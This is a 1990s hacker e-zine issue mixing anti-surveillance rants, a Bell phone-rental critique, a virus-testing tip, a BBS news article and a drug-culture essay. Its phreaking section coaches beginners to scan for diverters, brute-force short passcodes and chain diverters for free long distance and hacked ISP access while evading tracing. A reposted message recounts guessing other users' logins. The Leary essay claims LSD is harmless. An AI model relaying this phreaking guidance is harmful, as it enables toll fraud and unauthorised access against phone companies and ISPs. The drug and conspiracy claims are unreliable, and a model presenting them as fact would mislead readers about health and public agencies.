💾 Archived View for gemini.spam.works › mirrors › textfiles › groups › DAMAGEINC › damage.004 captured on 2023-01-29 at 15:01:02.

View Raw

More Information

⬅️ Previous capture (2020-11-01)

-=-=-=-=-=-=-


     ???????  ??????  ????????? ??????  ??????? ???????     ????????????????
 ??????? ??????? ??????? ????????? ??????? ???? ????? ??????????? ?????????????
???????  ???????????????????????????????????????????????????????  ?? ??? ?????
   ????????????? ?????? ?????????? ??????????????????? ????????? ?????????????
                          "The name speaks for itself!" ??

                                  Presents the

                             Damage, INC. Newsletter

                             December 1997 Issue #4.

                          "We're gonna phreak you out."

???????????????????????????????????????????????????????????????????????????????
                                C O N T E N T S :


? INTRODUCTION - An Introduction to the Damage, INC. Newsletter.

? BIG BROTHER BASHING - Statistics Canada and CSIS are listening and watching.
   ? Search String: {BIG BROTHER}

? BLACKENED'S TIP OF THE MONTH - Virus detection techniques.
   ? Search String: {BLACKENED}

? CONSPIRACIES AND COVERUPS - Bill C-17:  Kiss your rights goodbye.
   ? Search String: {COVERUPS}

? CORRUPTION AND GREED - Bell preys upon naive customers.
   ? Search String: {GREED}

? H/P INFORMATION AND NEWS - Information on ANIs and diverters.
   ? Search String: {NEWS}

? INTERVIEWS AND INTERROGATIONS - Savage Dragon's hilarious message.
   ? Search String: {INTERVIEWS}

? LETTERS TO THE EDITOR - More feedback about the Damage, INC. Newsletter.
   ? Search String: {LETTERS}

? OBJECTIVE OPINIONS - Timothy Leary and Drugs.
   ? Search String: {OPINIONS}

? REPORTS FROM THE FRONT - Cybernauts sing the praises of Bulletin Boards.
   ? Search String: {REPORTS}

? SOURCE AND SCRIPTS - DAMSMALL virus source code.
   ? Search String: {SOURCE}

? THE JOURNALIST'S TOP TEN LIST - Not Available in this issue.
   ? Search String: {TOP TEN}

? THOUGHTS, POEMS AND CREATIVE WRITING - A short poem titled "Awakening".
   ? Search String: {WRITING}

? CLOSING COMMENTS - BLACKENED's Hostile Closing Comments.
   ? Search String: {CLOSING}

???????????????????????????????????????????????????????????????????????????????


INTRODUCTION:  Phreaking Bell...Phreaking Bell...Phreaking all the way.  Oh
               what fun it is to phreak to a new exchange.  Hey.  That should
               get you in the spirit.  ;)  A special shout goes out to our
               readers in B.C.  We should have a Damage, INC. Dist. Site in
               your area soon.  To the rest of our loyal readers in 519 etc.
               we haven't forgotten about you.  Keep reading, learning and
               experimenting.  Also, I realize there are quite a few newbies
               that are now reading the Damage, INC. Newsletter.  We aren't
               going to neglect you, so don't worry.  To those that do not
               enjoy reading what we write:  phreak you.


BIG BROTHER BASHING -                                         {BIG BROTHER}
Statistics Canada and CSIS are listening and watching:

Statistics Canada (commonly referred to as Stats Canada) and CSIS (which
stands for Canadian Security Intelligence Service) are listening and watching.
I'm sure that if CSIS gets a copy of this article, I will be under their
surveillance.  That is, if I'm not already being monitored by them.  The main
purpose for writing about these two government agencies is to reveal what
they've done, show the power and control they've been given, and expose the
truth about how they work.

Stats Canada is a very corrupt agency.  It is an organization of people that
is designed to gather information on the citizens of this country.  Have you
ever received a government survey in the mail addressed to you?  If not,
then perhaps you've answered their questions over the phone or in person.
At any rate, Stats Canada sends out surveys in the mail.  They also call
people "at random" and expect you to answer their questions.  The reason I
put the words at random in quotes is because they actually target certain
people and repeatedly call them.  In fact, if they call and you refuse to
answer any questions, the Stats Canada representative will become rather
angry and aggressive.  I have personal experience with those bastards and
know exactly how they behave.  First, they said the "survey" was mandatory.
I told them that I wasn't going to answer any of their questions over the
phone... and politely stated I don't give personal information out to absolute
strangers.  Then, they replied that they can setup an appointment and ask
the questions in person.  I said I wasn't interested in filling out anything
or answering any questions.  That's when they snapped.  The voice of the Stats
Canada representative became emotional and upset... and she said that I must
answer her questions.  At that point, I was basically sick of talking to them.
However, I decided to ask what they'd do if I refused to answer any questions.
She then threatened to imprison me and said that I'm obligated by law to do
what they ask.  Hahaha.  I couldn't contain myself and began laughing.  Then
I just made up an excuse about being unavailable.  Before I hung up the phone,
she made another threat about calling back until I complete the survey.  That's
just one example of how Stats Canada treats (or threatens) average citizens.

Why does Stats Canada even exist?  The sickening truth is that they exist to
gather information on us.  They even target people and victimize them by
continually forcing them to answer questions, fill out surveys etc.  It should
be our right not to give out personal information.  We should have the option
to refuse answering their questions.  Also, the information and data that they
gather isn't kept confidential... even though they claim it is.  Stats Canada
has been caught *selling* people's information to private companies that create
databases.  Obviously, that's an illegal act on their part.  They intentionally
violate people's privacy in order to profit.  It was reported a few months ago
that Stats Canada was harassing people in B.C.  At least they didn't just take
it and are trying to fight them.  On a side note, Stats Canada also enjoys
falsifying and manipulating the statistics that they report.  As in, the
percentage of people that are unemployed, inflation, savings, the deficit etc.
You simply cannot trust any figures that they create.

CSIS is no better though.  In many respects, they are even worse than Statistics
Canada.  The Canadian Security Intelligence Service (CSIS) is extremely corrupt
and untrustworthy.  Several months ago, they were caught using illegal phone
taps on innocent citizen's phone lines.  They use unlawful methods to gain
access to personal information.  CSIS is also fond of installing bugs inside of
residences, without just cause or suspicion.  They don't just break and disobey
the laws, they flaunt it by abusing their power on a regular basis.  It would
be almost impossible to know if they are watching and listening... If that
isn't Big Brother in action, then the term "Big Brother" is meaningless.  I was
very surprised that the RCMP would reveal the actions of CSIS and expose them,
since those two organizations usually work closely together.  Perhaps there's
a much larger conspiracy at work.

CSIS is a dangerous, secret agency.  In my opinion, their sole purpose is to
keep an eye on the "dissidents" of this country.  They don't seem to be very
effective at spying and doing intelligence operations in foreign countries,
thus they concentrate their efforts on us instead.  CSIS infiltrated a group
named the Heritage Front, which is a "white supremacist" organization.  In the
end, the undercover CSIS agent ascended through the ranks and was a leader that
spoke at meetings.  Instead of just gaining information on the Heritage Front,
he actually helped them grow, become stronger, raise funds and awareness of the
group.  Haha.  That's a perfect example of how CSIS attempts to closely watch
an internal group of individuals, and it backfires when they benefit the group
that they've targeted.  There was even a documentary on TV about the entire
ordeal.  I must admit, it was hilarious to see a Heritage Front member thanking
CSIS for helping them and saying that they did absolutely no harm.  Meanwhile,
we pay millions of tax dollars to fund CSIS.  Why?  Well, the only answer is
so that they can fuck up like in that case and waste our money.  Or, so that
CSIS can bug the houses of every citizen that they deem to be "suspicious".

If you are affiliated with a group that's anti-government, you are instantly on
their hit list.  That is, no evidence is required for them to take actions
against you.  Is that democracy?  I think not.  CSIS is comparable to the CIA
in many ways.  The only major differences are that they aren't as organized,
established or powerful.  The CIA has tremendous resources and their power is
far reaching (the entire world), whereas CSIS mainly spies on the people within
Canada's own borders.  That is why they are the epitome of Big Brother.  Time
and time again they've demonstrated their willingness to flagrantly violate the
laws, rights and invade the privacy of Canadian citizens.  That's the reason
they should be eliminated before their control becomes stronger.  The only
plausible way to do that is by fighting fire with fire.  In other words, their
corrupt and sickening ways can be used against them.  I will continue to get
information on CSIS and write articles in order to expose the truth.  CSIS
actually stands for Cancer Spreading In Secrecy.  The key to destroying them is
information.  Instead of fearing CSIS, fight them by being prepared and by
possessing the knowledge of how they think and act.  Kill the cancer.

Written by BLACKENED ? Damage, INC. (C)opyright 1997.


BLACKENED'S TIP OF THE MONTH -                                  {BLACKENED}
Virus detection techniques:

There are many people that are paranoid about viruses these days.  Therefore,
they scan their computer systems regularly with virus scanners such as F-PROT,
McAfee's Scan, TBAV, Norton Anti-Virus etc. in an attempt to feel safe.  The
problem with that is, they are only given a false sense of security.  Those
virus scanners can't detect every virus.  Even if you use F-PROT Heuristics
Scan, you still won't be able to find everything.  However, you might encounter
some false alarms as it wrongly detects files that aren't infected at all.
F-PROT's secure scan will only detect viruses that were sent to Data Fellows
to be analyzed.  They disassemble it and create a scan string.  Then, the
new version of F-PROT that they release looks for that code in files.  It's
a rather simple method and quite primitive in a way.  If you want to continue
scanning your hard drives, or new files that you download... that's fine.  I'm
not trying to tell anyone not to do that.  In my opinion, that isn't the safest
or most reliable way to detect viruses.

The best method is to use another computer system for virus testing.  Using
an old 286 system with a hard drive is perfect for that task.  Then you can
do whatever testing you want, without worrying about files being infected etc.

Obviously, not everyone has more than one computer available to them.  That's
the reason I decided to write about virus detection techniques for those that
only have a single computer.  First, you need to get a copy of HideDrive by
Damage, INC.  Read the docs carefully before you attempt to use it.  Basically,
HideDrive is a utility that's designed to hide and unhide hard drives.  The
virus detection technique isn't difficult to use.  Simply copy the suspicious
file (or a known virus) to a floppy disk, as well as several COM and EXE files.
Then use HideDrive to hide every hard drive on the system.  Change from drive C:
to A:.  To check and make sure that the drives were properly hidden, try
changing to them by typing C:.  If the DOS error message "Invalid Drive
Specification" is reported, that means drive C: is hidden.  Now execute the
suspicious or infected file on the floppy.

The other COM and EXE files on the disk will be used for testing purposes.  If
their file size, date or time changes after you try executing the suspicious
file...that means they've been infected by a virus.  The virus might go memory
resident, so remove the disk and press your Reset button to be safe.  You can
then view the files with a hex editor to check and see if they were overwritten
or if code was appended by the virus.  Simply compare the files with the hex of
the actual virus.

You can comment out the nuke procedure, assemble the DAMSMALL virus and safely
use it with the above method for testing.  Once you have more experience using
HideDrive, you can test more complex viruses that go memory resident, use
stealth routines etc.  They won't be able to do normal writes to files that are
on your hard drives (as long as they've been properly hidden first).  ;)
As an example, if a virus attempted to infect COMMAND.COM (although most don't
do that for obvious reasons)... you'd probably see a DOS error message that
says "Invalid drive specification" since drive C: was hidden.  That is, the
virus wouldn't be able to write to C:\COMMAND.COM.  It can't infect a file that
it can't find and write to.  ;)  Just be careful using this method though.
HideDrive won't protect your hard drives from trojans that use BIOS writes etc.
That's the reason this method is only recommended for use with viruses.  If you
have any questions, contact us.

Written by BLACKENED ? Damage, INC. (C)opyright 1997.


CONSPIRACIES AND COVERUPS -                                      {COVERUPS}
Bill C-17:  Kiss your rights goodbye.

Disclaimer:
The sections of Bill C-17 (35th Parliament session) listed below comes from the
Government of Canada web site.  If there is any misinformation, they are
responsible for it.  It took me hours to find confirmation that Bill C-17
received royal assent, and was enforced by the Department of "Justice" of
Canada.  The Government intentionally makes it difficult to learn about laws.
"Ignorance of the law" is their greatest weapon.

On April 25, 1997, Bill C-17 received royal assent from the government.  Its
purpose is to amend the Criminal Code, as well as some other acts.  Some of
the notable sections are:  Immunity to criminal prosecution if a police officer
commits a crime while undercover (too many exemptions to list); making occupancy
in a stolen vehicle a criminal offence (section 15); and punishing those that
think they committed a criminal act, even if they didn't (section 28).

In this article, it is my intent to show you portions of Bill C-17 relating
to police searches and seizures.  These revisions to the Criminal Code
formally create loopholes for police officers.  I will start by showing you
section 46:

                   46. The Act is amended by adding the following after
                   section 487.1:

 Where warrant not 487.11 A peace officer, or a public officer who has
 necessary         been appointed or designated to administer or enforce
                   any federal or provincial law and whose duties include
                   the enforcement of this or any other Act of Parliament,
                   may, in the course of his or her duties, exercise any
                   of the powers described in subsection 487(1) or
                   492.1(1) without a warrant if the conditions for
                   obtaining a warrant exist but by reason of exigent
                   circumstances it would be impracticable to obtain a
                   warrant.

Basically, this gives a police officer an excuse if he decides to search your
premises without a warrant.  Who determines the "exigent circumstances?"  The
police officer of course.

Let's look at section 41, which may be of interest to hackers and phreaks.
Section 41 deals with search and seizure of computer data.

                   41. Section 487 of the Act is amended by adding the
                   following after subsection (2):

 Operation of      (2.1) A person authorized under this section to search
 computer system   a computer system in a building or place for data may
 and copying
 equipment

                        (a) use or cause to be used any computer system at
                        the building or place to search any data contained
                        in or available to the computer system;

Section 2.1(a) is particularly disturbing.  What is considered "available to the
computer system?"  Can a cop use the computer system with a modem and phone line
to search other computer systems "available to" it?  The vagueness of 2.1(a)
opens up a multitude of loopholes for the investigator.

                        (b) reproduce or cause to be reproduced any data
                        in the form of a print-out or other intelligible
                        output;

                        (c) seize the print-out or other output for
                        examination or copying; and

                        (d) use or cause to be used any copying equipment
                        at the place to make copies of the data.

These subsections add insult to injury.  The cop can seize a blank floppy under
(d) and use it to satisfy (b).  Any computer hardware you own *will* be used
against you.

 Duty of person in (2.2) Every person who is in possession or control of
 possession or     any building or place in respect of which a search is
 control           carried out under this section shall, on presentation
                   of the warrant, permit the person carrying out the
                   search

                        (a) to use or cause to be used any computer system
                        at the building or place in order to search any
                        data contained in or available to the computer
                        system for data that the person is authorized by
                        this section to search for;

My own perception of this subsection is that the person being searched is
supposed to act as an assistant to the cop.  Look at the words "cause to be
used."  What is the scope of that?  Must the person being searched provide
passwords and encryption keys in order to satisfy 2.2(a)?  If so, the person
being searched either incriminates himself, or is charged with obstructing the
cop's search.

                        (b) to obtain a hard copy of the data and to seize
                        it; and

                        (c) to use or cause to be used any copying
                        equipment at the place to make copies of the data.

22(b) and (c) reinforce 21(b), (c) and (d).  The person being searched is
supposed to allow (assist) the cop in obtaining copies of the data.

It would be to the advantage of the cops and crown prosecutors if the suspect
is forced to provide complete access to the data on his system.  Once they
obtain access to any incriminating (or allegedly incriminating) data, they
can seize every electronic device "in or available to" the data.  Under
section 48(2) (entitled Seizure without warrant) of Bill C-17, it is possible
for a police officer to seize anything that he believes was used to perform
a criminal act.  If the cop doesn't want to do that, he can pick up your phone,
call up a judge and get a "telewarrant" (sections 42(7) and 44(3)) for anything
else he wants to search for or seize.

I could go on for many more pages talking about other sections that deal with
search and seizure.  However, the small amount of text that I imported from
Bill C-17 should be enough for you to realize that section 8 of the Charter of
Rights and Freedoms ("the right to be secure against unreasonable search and
seizure") is a fucking joke.  Bill C-17 is nothing more than a huge government
conspiracy to make any person living in Canada vulnerable to (literally)
unwarranted police invasion.  With extended powers and criminal immunity, the
police can arrest anyone for anything.  The government seeks total control over
the population, and the threat of imprisonment, and financial ruin due to legal
fees, does keep some people under their thumb.

The way I see it, they are trying to coverup the fact that they are taking
active steps to create the Canadian Thought Police.  Don't assume that you have
certain rights and freedoms, because as each bill is passed they are being
raped from us.  Assuming anything is a mistake in itself.

Written by Shatazar ? Damage, INC. (C)opyright 1997.


CORRUPTION AND GREED -                                              {GREED}
Bell preys on naive customers.

Bell is a well known, fat cat company that enjoys a monopoly of telephone
service in Canada.  Since they've never had to compete in an open marketplace,
they rely on their monopoly in order to finance their greedy corporate culture.
Bell is known for their total lack of respect for their customers.  They
know that there is no where else for people to go for local telephone service.

At one time, Bell had a monopoly on the telephone itself.  The only "legal"
telephones were the ones that were rented directly from Bell.  This policy
was enforced for decades.  Then Bell was forced to soften the policy.  Bell
required that one telephone must be rented from them, but extension
telephones could be purchased.  That is over now.  Bell can't force us to
rent one of their shitty, overpriced telephones anymore.

Bell still makes a tremendous amount of money from naive customers that
continue to rent telephones.  Why do these people choose to rent a telephone
from Bell?  Unlike major household items, a telephone is a relatively
inexpensive machine.  Telephones are also fairly uncomplex, so they can be
used for decades without having any kind of a breakdown.  I personally fail
to see why anyone should rent a telephone.  Unless the intent of telephone
renters is to feed Bell's greed by joyfully putting money into their pocket.
:-(

Bell's primary residential phone renters can generally be put into two
groups.  The first groups are young yuppies that rent the "top of the line"
telephone with all the little Bell buttons.  They "need the best" to compete
with their snobby neighbours.  Since they may not be able to afford one
that costs $250 or more, they rent it.  These morons also believe that blowing
money on all of Bell's services (Call Screening, Caller-ID, etc.) is a
necessity.  If these people would have a little bit of self-control, they would
save up enough money to buy the phone outright.

I do have some sympathy for the second group of Bell telephone renters; the
elderly.  They are from the era of the Bell "rental monopoly" and many haven't
realized that they can return Bell's phone and own their own.  Most seniors are
trusting people, so they don't tend to look at their telephone bill carefully.
They don't realize how much money they have allowed Bell to take from them.  Of
course, Bell is careful to let seniors think that their corrupt telephone
policies are still in effect.  To this day, Bell service operators still ask "Do
you have a Bell phone?"

However, I have found it isn't a total waste of time to inform seniors how they
are being gauged by Bell.  My grandmother rented a Harmony touch tone telephone
from Bell for 13 years.  Bell charged her $3.55 per month, plus 15% taxes.  That
works out to be $48.99 per year.  (Try multiplying $48.99 by the millions of
people that rent phones from "Ma Bell" :-().  A refurbished Harmony phone costs
$14.99 ($17.29 with taxes) at a discount department store.  A new Harmony phone
doesn't cost much more than $25.  Here is the real kicker.  Performing simple
math, 13 * $48.99 equals $636.87.  That doesn't even count the years she rented
one of those ancient, black rotary phones that sit in many bedrooms, basements,
attics and barns throughout Canada.

When I found out that she was renting, I helped her by doing the above
calculations.  And she understood them.  She paid for 40 refurbished Harmony
phones over the past 13 years.  She decided that she wanted to stop the eternal
bleeding that Bell was causing.  We returned the Harmony phone to Bell, and she
bought a new telephone with large buttons, which will pay for itself in two
years.

I recommend that you do the same thing for the naive.  Ask you parents, your
grandparents, and everybody else you have respect for if they rent a phone from
Bell.  Help them out with some simple mathematics.  Let them know how many
telephones they could have bought with the money they gave to Bell.  Hopefully,
they will no longer want to be a part of the rental scam that Bell has been
profiting from since their corrupt beginnings.  Either that or you can take
matters into your own hands.  Since Christmas is near, you could cross one
gift off of your list by buying them a telephone.  You'll also be eliminating a
little bit from Bell's income statement.  'Tis always the season to fight back
against Bell!  ;-)

Written by Shatazar ? Damage, INC. (C)opyright 1997.


H/P INFORMATION AND NEWS -                                           {NEWS}
Information on ANIs and diverters:

This section was written and intended for newbies that have little or no
phreaking experience.  First, I'd like to clear up some misconceptions.  I've
been asked questions such as "Does *67 cost anything?" many times by users
on boards in 519.  *67 is free.  Also, I've seen people ask "Does *67 block
out the phone number if the other person uses *69 after you hang up?"  Yes,
your number won't be reported to them.  "Does *67 get around call screening?"
No, it doesn't.  If the person uses call screening to prevent you from calling
them from a certain number, you need to use a diverter.  ;)  Maybe a complete
list of Bell *## codes and what they do is necessary.

ANIs/ANACs and diverters are two things that novice phreaks should definitely
learn and know about.  They are both very important and useful for several
reasons.  ANACs (Automatic Number Announcement Circuits) can be local or 1-800
numbers etc.  As an example, you dial the number 1-800-555-5555 and it reports
what your number is.  Obviously, it's useful for finding out the number while
you're beige boxing...but also for finding out if an extender diverts.  If you
have an extender and want to find out if it's also a diverter, simply use it to
call an ANI.  Not all extenders divert though.  Plus, there are occasions when
you need a local diverter that isn't an extender.  For example, if you wanted
to call a local ISP and divert your number.  To find diverters, use ToneLoc to
scan for them.  You'll probably find a diverter or two, some extenders, PBXs
etc.  Usually, there's a 4 or 5 digit passcode on them which can be hacked
quickly.  If the passcode is more than 6 digits, try hacking another one as it
will require too many attempts.

At this point, you might be asking "What do I need a diverter for anyways?"
If you plan on dialing out through a PBX or using an extender for free ld, you
should consider using an extender.  Another instance would be hacking an ISP
or using hacked accounts.  Diverters are also useful for calling numbers that
have Caller ID, Call Screening or an ANI.  Many PBXs, 1-800 extenders, systems
etc. have ANIs...so use diverters to avoid being busted.  You can also use
extenders that divert (check to make sure they do first) to access an ISP
through the local number they have in that area.  Most ISPs have numbers that
are local to different areas, so using extenders that divert is a fairly good
method to use.  Using several diverters is even better and more difficult to
trace.  Don't assume that the number you're calling doesn't have an ANI unless
you want to get busted.  Once you have some diverters, you can use them with
ToneLoc to scan etc. safely.  The possible uses for them are almost endless.

ANIs can also be used with CNAs.  "What the fuck is a CNA?"  CNA stands for
Customer Name and Address.  If you're beige boxing and used an ANI to get the
phone number (or you just want to find out the Name and Address of a telephone
number) you can use a CNA to get that information.  There are local and ld CNAs
as well as 1-900 (pay per minute) CNAs that some private companies provide as a
service.  Most of them are setup by the local telco for use by linesmen etc.
They use an ANI to find the number for a line (which is just a pair of wires),
and then they dial the CNA number to find out their Name and Address.  Telco
personnel use them and phreaks do as well.  They're quite useful in any
situation when you require that information.  As in, you can setup a
teleconference while you are beige boxing by using an ANI and a CNA.  ;)

In the next issue of the Damage, INC. Newsletter there will be more information
on PBXs, VMBs etc.  I'll discuss what they do, how to find them, hack them and
use them without getting caught.  Until then, start reading phreaking related
text files, experiment with ToneLoc and any codes that you find.

Written by Blackie Lawless ? Damage, INC. (C)opyright 1997.


INTERVIEWS AND INTERROGATIONS -                                {INTERVIEWS}
Savage Dragon's hilarious message:

I simply couldn't resist including a copy of this message in the Damage, INC.
Newsletter.  It was posted in a public base on FoI Archives.  My intention
isn't to humiliate him.  I'm not trying to be malicious in any way.  I just
found it hilarious.  Basically, I decided to publish it instead of doing an
interview or interrogation in this issue.  Just remember, anything that you
post on a board can be captured/imaged and used by anyone else for their own
purpose.  In this case, we just took a message and published it so that our
readers in other area codes (outside of 519) can have a good laugh.  ;)

-------------------------------------------------------------------------------
There I was .. a clueless newbie with an internet account from daddy.  I got
into the irc business, all the good stuff.  Then I learned about shells.  I
found out I had one, and learned how to access it (tough stuff).  So, I ftp'd
to to it using good old cuteftp, and started looking around at not only the
shit in my directory, the shit in other directories.  There I noticed there
was a big names list of all the poeple's login names.  I was in business.  Big
time.  After I wrote down about 30 names from the list, I loaded up good old
telnet.exe and telnet'ed to my isp, trying every username i wrote down, as for
the password, i just used the username too. :P  As I was chatting on irc, no
doubt everyone was laughing at my incredible 'hax0ring' skills, they told me
to try the login name "root".  I tried that for about 10 logins, and then
poof, i was disconnected.  I went to reconnect, and every time it wouldn't
work.  So i called them up and told them something was wrong with my account,
and I couldn't login.  In response, they told me "ya, we locked you out".  I
chatted with them for a while, then left still wondering how they traced me.
:)  I was on my sentex accoutn, telnetting to sentex.  Smart. :P  Uh.  I'm
getting sick of this shit ..

savage dragon
-------------------------------------------------------------------------------


LETTERS TO THE EDITOR -                                           {LETTERS}

I received these messages on FoI and Distraught Continuum.  If you have any
feedback, leave BLACKENED Email or Netmail.


Date: 2:32 pm  Thu Nov 27, 1997        Number : 746 of 749
From: Sprite                           Base   : [Damage, INC. Discussion]
To  : Blackened                        Refer #: None
Subj: Damage, INC Newletter #3         Replies: None
Stat: Normal                           Origin : Local


I just got done reading the latest newsletter..  When I read your "Interview"
with Billy boy...  I almost pissed myself laughing..  twice.  Your information
is always accurate and your 'gut instinct' <-refering to latest interview!
Should be applauded..  Well.. I hope you keep it up..  It's looking very
promising!

l8r

 .??.
 `?..?$p?????..??

date: 1:19 pm  sat nov 29, 1997        number : 4 of 4
from: Kalamity                         base   : Private Mail
to  : Blackened                        refer #: none
subj: Hey                              replies: none
stat: normal                           origin : local

Just thought I'd drop a note letting you know that I downloaded all the Damage
Inc. newsletters released so far, and that I think they're excellent!  One
thing I will try is Toneloc.  Because, honestly, who likes paying Bell for
long distance charges?  :)

Kalamity
-------------------------------------------------------------------------------

Editor - Sprite, we're glad you enjoyed the interrogation of Billy Gates.  It
         was intended to be humorous.  Basically, we wanted to humiliate him
         and give the readers a good laugh at the same time.  ;)  Thanks for
         the feedback man.

         Kalamity, I hope you continue reading the Damage, INC. Newsletter.
         It is good that you're taking an interest and learning more about
         ToneLoc etc.  Your point about ld charges is well taken.  Thanks for
         the feedback and compliment about our releases.


OBJECTIVE OPINIONS -                                             {OPINIONS}
Timothy Leary and Drugs:

"Turn on, tune in, drop out"
"Surfing the chaos"

Timothy Leary lead an amazing life.  He advocated the use of LSD and other
psychedelic drugs... that expand your mind.  He was outspoken, and not afraid
to break the laws in order to convey his message.  He was imprisoned, made a
daring escape... fled the United States... and lived in Switzerland until he
was captured in Afghanistan and returned to the U.S.  He was anti-establishment
and believed in personal freedom and thought.  Even in death, he managed to
capture attention by having his head removed and frozen... to be preserved in
a cryogenic state.  His body was then cremated and the ashes were dispersed in
space.  His death was filmed, and I was able to watch as they cut off his head
and put it in a clear container filled with ice.  His face was positioned
towards the camera.  I can honestly say, I have never seen anything quite like
that before.  Of course, it's possible that the decapitation of his head was
faked.  Real or not, he managed to make everyone that viewed the event think.

Leary had many accomplishments that are noteworthy.  He toured universities as
a speaker.  He had a PhD and was also a writer.  Over the years, he wrote many
books.  Some of them were written while he was serving a sentence in a
California prison.  Leary once said that law enforcement was closely related to
agriculture since "police officers are very skilled at planting." to paraphrase
him.  He was busted for possession of two joints, which a cop put into the ash
tray of his car.  Given his reputation, it shouldn't be too difficult to picture
them framing him.  The judge didn't give him bail at his trial because he said
his "ideas were dangerous".  President Richard Nixon called Timothy Leary
"the most dangerous man alive." because of the books he'd written and the
speeches he had made.  Imagine that.  Meanwhile, Leary was just a philosopher
with ideas that the government didn't agree with.  He was persecuted for his
ideas, his words, his lifestyle and his mind.  That was the real weapon.
Leary's imagination and philosophies weren't "acceptable" to the Government of
the United States of America.  In their view, he had very dangerous ideas about
drugs etc. that they are still trying to battle in their little "war against
drugs" until this day.  However, they will never win the war on drugs... as long
as there are eloquent, aggressive, free thinkers like Leary around to speak out.

Don't conform.  Become Informed.  Don't just believe everything like a zombie.
Instead of listening to propaganda that is intended to brainwash you, educate
yourselves.  LSD won't harm you.  The THC that's in marijuana doesn't
permanently alter your brain.  ;)  The anti-drug campaign is orchestrated by
unintelligent members of Big Brother.  They will tell you that smoking weed
makes you stupid.  If that's true, how was Leary (a frequent drug user) able to
write so many excellent books?  Also, why can't they create more imaginative
slogans?  "Just say No" says nothing at all.  They group everything together.
Are crack, heroin, cocaine, hash, acid, marijuana etc. all the same?  No, of
course not.  Yet, that's what you are *told* and supposed to believe.  Here
is my answer to that:  Fuck "the establishment".  Fuck "the system".
Fuck "society".  Fuck Big Brother.  They lie in order to control the citizens.
They expect their words to be taken as truth.  They're wrong in assuming that
everyone is blind.

Leary was a very controversial figure.  Big Brother tracked, monitored and
feared him because they thought he was a threat to "society".  He had strange
ideas, different behaviour and ways of doing things.  That is, he didn't just
go with the grain.  In fact, he was infamous for saying things that go directly
against the norm.  That is why I feel that he was a genius.  I'm not basing
that statement purely on his intellect either, but rather the way in which he
lived his life.  He wasn't afraid to be involved in the whole counter-culture
movement of that era.  Leary was also a cool person that bridged the generation
gap and could relate seemlessly with much younger people.  He was able to teach
them about things that weren't often discussed openly during that time.  Leary
would say anything that he believed in, and should be commended for doing that.

I *know* some of you are enlightened enough to understand the message that is
expressed in this short article, and form your own opinions.  That's all that
I can ask for.  Unfortunately, the same can't be said of your own government...
as they don't want you to read this and form your own opinions about what is
written.  My final comment is that I've seen some of Leary's expressions altered
and abused for commercialism and capitalism.  As in, "Turn on, tune in and win"
has been used to advertise contests etc.  In my opinion, that is a pathetic
example of how a message can become distorted and used for another purpose.
The majority of the time, the purpose is to exploit it and make money.  Greed is
another topic though, so I'll just end this by saying; Think and you will
prosper.

Written by BLACKENED ? Damage, INC. (C)opyright 1997.


REPORTS FROM THE FRONT -                                          {REPORTS}

(c) 1997 Mark Stachiew
(c) 1997 The Montreal Gazette 

CYBERNAUTS SING THE PRAISES OF BULLETIN BOARDS
by Mark Stachiew

  Back in the Stone Age of computers, before Bill Gates had made his
first million and the Internet had yet to see its first "spam" message,
computer users talked with each other via Bulletin Board Systems
(BBSes).

  While the World Wide Web has taken a bite out of the number of
BBSes, they never really went away and now the old-timers who still
use them are banding together to tell cyberspace newcomers what
they're missing.

  A BBS is basically a computer sitting in someone's home running
software which allows it to answer incoming calls. Other computer
users call the BBS to exchange messages, play games and download
computer programs. It really is an electronic bulletin board.

  They are usually free to call since the system is being run as a
hobby by someone who is donating time and computer. No fancy browsers
or hardware are required. The lowliest computer with a modem and
terminal program will be enough to connect to a BBS.

  Longtime users of BBSes remain nostalgic about the early days of
the 1980s when the first home computers gave birth to the fledgling
bulletin boards. In those days BBS callers used glacially-slow 300
baud modems with acoustic couplers that had to be fit over telephone
handsets and looked like rubber earmuffs. They endured these hardships
because of the magic that BBSes created. It was a new form of
communication which allowed people to make contact with total
strangers which sometimes developed into lifelong friendships.

  Lynda McCormick knows all about BBSes bringing people together. She
runs one of the oldest ones in Montreal. McBB has been in continuous
operation since 1984 [typo here, actually it was 1987 - we just
celebrated our 10th anniversary this month! --Bl.] and people who
called on the first day are still calling 13 [10] years later. "Some
of the old-time users will still call in long-distance when they've
moved away," she says. "Not on a regular basis, but it's fantastic to
hear from them and hear how life is treating them now in Toronto,
London, Ontario, Seattle, or L.A."

  McCormick is still enthusiastic about BBSing and is creating an
online BBSing Museum with electronic ephemera from BBSes which have
long since vanished into the ether. "The BBS scene in Montreal has
been a very rich one with many characters, personalities and a few
very hilarious stories," she says. "I for one would like to see it
preserved and cherished as it should be, and not simply swept away
and forgotten."

  One local BBS operator, Steve Monteith, has maintained a list of
Montreal bulletin boards (www.vir.com/~capt_xerox/bbslist.html) for
nearly 12 years. Looking over archives of the list demonstrate how
much damage the Web has done to BBSing in this city. In 1989, 
Montreal boasted 175 computer bulletin boards. That number grew
steadily, peaking at 482 in 1995 which is about the time the Web began
to blossom. Since then the number of BBSes has plummeted to 221. At
that rate of decline they could be extinct in two years.

  So do BBSes have a future? The people who still use them think so.
They persist because they create a sense of community among users and
because callers usually live in the same town, so they are able to
get together offline where friendships are formed. That can be
difficult on the Internet where you could be exchanging E-mail with
someone from Zimbabwe or Kuala Lampur.

  Monteith notes a few other advantages of the local BBS over the
Internet. You won't get unwanted E-mail (spam) and BBSes are rarely
commercial. "You can read through whole message bases, and not see an
advertisement and you can be quite sure that your name on a BBS isn't
going to be sold to some mailing list."

  An international grass-roots organization has sprung up to spread
the word about BBSes. The Council for Online Community Alternatives
(http://coca.home.ml.org) aims to promote BBSes as an alternative to
the Internet and to build awareness among computer users that BBSes
are available in their communities. They maintain that in recent
years millions of people have rushed out to buy computers thinking
their only online alternative was the Internet, oblivious to the
existence of local BBSes.

  COCA likes to point out some of the advantages of BBSes. For
example, at peak times the busy Internet can slow to a crawl. That
isn't a problem on a BBS since there is usually only one user
connected at a time so your new fast modem will actually work at full
speed. Unlike most discussion groups on the Internet, the ones on
BBSes are usually moderated and ill-tempered "flame" wars are less
common. And pornography is much rarer on BBSes.

  BBSes are becoming more sophisticated. Many local BBSes now offer
Internet E-mail and access to select Usenet newsgroups. Some have lots
of downloadable files while others use flashy terminal programs which
give them a graphical interface which is almost as easy to use as a
Web browser. Some bulletin boards are even directly accessible over
the Web, usually via telnet. You can find a list of other Internet
BBSes at http://dkeep.com/sbi.html.

  Other BBS resources on the Web:

                               BBS FAQ
             www.sysopworld.com/bbsfaq/text/faqmain.htm

                 DIRECTORY OF NORTH AMERICAN B.B.S.es
                  www.thedirectory.org/areacode.htm

